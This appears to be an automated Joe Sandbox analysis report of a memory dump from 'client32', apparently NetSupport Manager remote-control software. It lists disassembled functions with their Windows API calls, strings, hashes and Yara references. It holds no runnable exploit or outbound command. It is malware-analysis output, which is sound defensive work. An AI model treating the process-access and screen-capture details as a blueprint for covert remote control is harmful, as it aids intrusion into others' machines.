                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                              • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                              • API String ID: 2071925733-2101319552
                                                                              • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                              • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                              • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                              • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                              Function 110CE180 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 461COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CE21C
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CE247
                                                                              • GetObjectA.GDI32(?,0000003C,?), ref: 110CE269
                                                                              • CreateFontIndirectA.GDI32(?), ref: 110CE29C
                                                                              • GetWindow.USER32(00000000,00000005), ref: 110CE2EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: RectWindow$ClientCreateFontIndirectObject
                                                                              • String ID: WM_DPICHANGED, newDpi=%d, oldDpi=%d; newFont=%d, oldFont=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$vector<T> too long
                                                                              • API String ID: 242201110-4090043186
                                                                              • Opcode ID: 8071484fa87b7de774024e97d344c0547745bb2c7e0811cf1b0246d23679c2c7
                                                                              • Instruction ID: 11f9a6c21b3382fc2b7f861042b4248f92e0dde1ac544a85ffb2751bdf35cce8
                                                                              • Opcode Fuzzy Hash: 8071484fa87b7de774024e97d344c0547745bb2c7e0811cf1b0246d23679c2c7
                                                                              • Instruction Fuzzy Hash: 7AF11D75E002299FDB14CF68CD85B9EBBB5FB88704F148199E919AB284DB70AD41CF90
                                                                              Function 1100C530 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 185libraryloaderthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(00000010), ref: 1100C587
                                                                              • InitializeCriticalSection.KERNEL32(00000028), ref: 1100C58D
                                                                              • InitializeCriticalSection.KERNEL32(00000040), ref: 1100C593
                                                                              • InitializeCriticalSection.KERNEL32(00000058), ref: 1100C599
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1100C5A3
                                                                              • GetVersion.KERNEL32 ref: 1100C6AE
                                                                              • LoadLibraryA.KERNEL32(msacm32.dll), ref: 1100C6BF
                                                                              • GetProcAddress.KERNEL32(00000000,acmStreamOpen), ref: 1100C6DB
                                                                              • GetProcAddress.KERNEL32(?,acmStreamClose), ref: 1100C6EF
                                                                              • GetProcAddress.KERNEL32(?,acmStreamSize), ref: 1100C703
                                                                              • GetProcAddress.KERNEL32(?,acmStreamPrepareHeader), ref: 1100C717
                                                                              • GetProcAddress.KERNEL32(?,acmStreamConvert), ref: 1100C72B
                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0000C0F0,00000000,00000000,?), ref: 1100C75A
                                                                              • GetProcAddress.KERNEL32(?,acmStreamUnprepareHeader), ref: 1100C73F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • SetThreadPriority.KERNEL32(00000000,00000001), ref: 1100C780
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1100C787
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalInitializeSection$CreateExitProcessThreadwsprintf$CloseErrorEventHandleLastLibraryLoadMessagePriorityVersion_malloc_memset_strrchr
                                                                              • String ID: ..\ctl32\AUDIO.CPP$acmStreamClose$acmStreamConvert$acmStreamOpen$acmStreamPrepareHeader$acmStreamSize$acmStreamUnprepareHeader$hAudio$idata->hEvent$msacm32.dll
                                                                              • API String ID: 164558982-2117072583
                                                                              • Opcode ID: cfefa6cb48f10cb449d761e04fb00ecc249e30a8e65a1387da47812114e30642
                                                                              • Instruction ID: 049fab11b20bb768323fb1b34283fa62b23a8e76d4d9a3094b6e7a7a4f077f96
                                                                              • Opcode Fuzzy Hash: cfefa6cb48f10cb449d761e04fb00ecc249e30a8e65a1387da47812114e30642
                                                                              • Instruction Fuzzy Hash: FD61AEB5A40709ABEB20DFB5CD45BDAFBE4AF54304F00492EE96AD7280EB74B500CB50
                                                                              Function 11044560 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 330windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                              • ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 110445AE
                                                                              • _memset.LIBCMT ref: 110445FA
                                                                              • _strncpy.LIBCMT ref: 11044628
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$EnvironmentExpandExtractIconItemObjectRectShowStringsText_memset_strncpy
                                                                              • String ID: *UserAckRejectDefault$*UserAckRejectWording$*UserAckWording$AckDlgDisplayText$AckDlgTimeOut$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$helpdesk.ico$m_hWnd
                                                                              • API String ID: 3726536655-1930157642
                                                                              • Opcode ID: fa8fde9e457a20ced63446e2290e55f221f982a787cf21ad9a52e8aeb565463c
                                                                              • Instruction ID: fc0abad737311a416c98c50a3634a6be576f3590c14db7ba0421e6f6af2d9a9c
                                                                              • Opcode Fuzzy Hash: fa8fde9e457a20ced63446e2290e55f221f982a787cf21ad9a52e8aeb565463c
                                                                              • Instruction Fuzzy Hash: F1B149B8B40315AFE714CB64CCC5FEAB3A5AF48708F2045A8F6559B6C1DAB1B940CB90
                                                                              Function 1109E1E0 Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 278COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109E262
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109E285
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1109E290
                                                                              • ResetEvent.KERNEL32(00000000), ref: 1109E2A5
                                                                              • ResetEvent.KERNEL32(?), ref: 1109E2AB
                                                                              • SetEvent.KERNEL32(?), ref: 1109E2B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                              • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                              • API String ID: 1194186020-3727536503
                                                                              • Opcode ID: c107bb4b7b451d0f8caa07485551e788f298ebf9abbf6cfa4dcf7a792082ab30
                                                                              • Instruction ID: 4445ea8f834aec2c07a1bae548667dcf69b2078721e8a9311ea9bd6b0b067be8
                                                                              • Opcode Fuzzy Hash: c107bb4b7b451d0f8caa07485551e788f298ebf9abbf6cfa4dcf7a792082ab30
                                                                              • Instruction Fuzzy Hash: 88B18AB5A002188FD724CF65C990B5AF7F5BB88314F108A9DE55A9B681CB70ED81DFA0
                                                                              Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,AB86ACF8,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11138283
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                              • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                              • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                              • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                              • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                              • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                              • API String ID: 348974188-2591373181
                                                                              • Opcode ID: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                              • Opcode Fuzzy Hash: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                              Function 11020310 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 269windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,0000139C), ref: 1102034F
                                                                              • GetWindowRect.USER32(00000000), ref: 11020358
                                                                              • GetDlgItem.USER32(?,000013BE), ref: 11020367
                                                                              • GetWindowRect.USER32(00000000), ref: 1102036A
                                                                              • IsWindowVisible.USER32(?), ref: 110203D3
                                                                              • GetDlgItem.USER32(00000000,000013C2), ref: 110204AD
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110204B2
                                                                              • GetDlgItem.USER32(00000000,000013C3), ref: 110204DE
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110204E3
                                                                              • GetDlgItem.USER32(00000000,000013C2), ref: 11020511
                                                                              • ShowWindow.USER32(00000000), ref: 11020514
                                                                              • GetDlgItem.USER32(00000000,000013C3), ref: 11020542
                                                                              • ShowWindow.USER32(00000000), ref: 11020545
                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                              • GetDlgItem.USER32(00100000,0000139C), ref: 110205B5
                                                                              • GetDlgItem.USER32(00100000,0000139C), ref: 110205D5
                                                                              • SetWindowPos.USER32(00000000), ref: 110205D8
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11020619
                                                                              • UpdateWindow.USER32(00000000), ref: 1102066C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$Enable$RectShow$UpdateVisiblewsprintf
                                                                              • String ID: NSMChatExDlg::OnWhiteBoard - Mode %d$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1139678934-4020333243
                                                                              • Opcode ID: bf302f3f50b72fa046df3b71313cba82a1b11e2870ffdb6b8516b1e7006a154a
                                                                              • Instruction ID: d891f5d5e415915a6e5e6ee3e5f20cb4cdde8798b9037e3cc37bb1097e49140c
                                                                              • Opcode Fuzzy Hash: bf302f3f50b72fa046df3b71313cba82a1b11e2870ffdb6b8516b1e7006a154a
                                                                              • Instruction Fuzzy Hash: D7A1B174B40319AFE710CF60CC89F9EB7E6BB88708F108658F5166B6C4C774A941CB94
                                                                              Function 11144580 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$_memset_strrchr
                                                                              • String ID: (%d.%02d.%d.%d)$ + %d bytes$%s + %d bytes$, %s, Line %d$0x%08X $<unknown module>$<unknown symbol>
                                                                              • API String ID: 4236257132-983257157
                                                                              • Opcode ID: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
                                                                              • Instruction ID: 293bca24da915293cfb006549a27a8b3087cf55c4de6a639cfa4b0299eb0fa9d
                                                                              • Opcode Fuzzy Hash: a0ef6df3c23f1de90c9332116cf72623786e7006b97500c467b7cdb199fce978
                                                                              • Instruction Fuzzy Hash: 675185B1940629ABDB25CB258C40FEAF3BCAF45708F0041D9FD08A2640EB75AB55CFA5
                                                                              Function 11146270 Relevance: 38.6, APIs: 11, Strings: 11, Instructions: 58libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11143CE0: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 11143D1B
                                                                                • Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D2A
                                                                                • Part of subcall function 11143CE0: _strrchr.LIBCMT ref: 11143D3A
                                                                                • Part of subcall function 11143CE0: wsprintfA.USER32 ref: 11143D55
                                                                              • GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111462A5
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111462B2
                                                                              • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111462BF
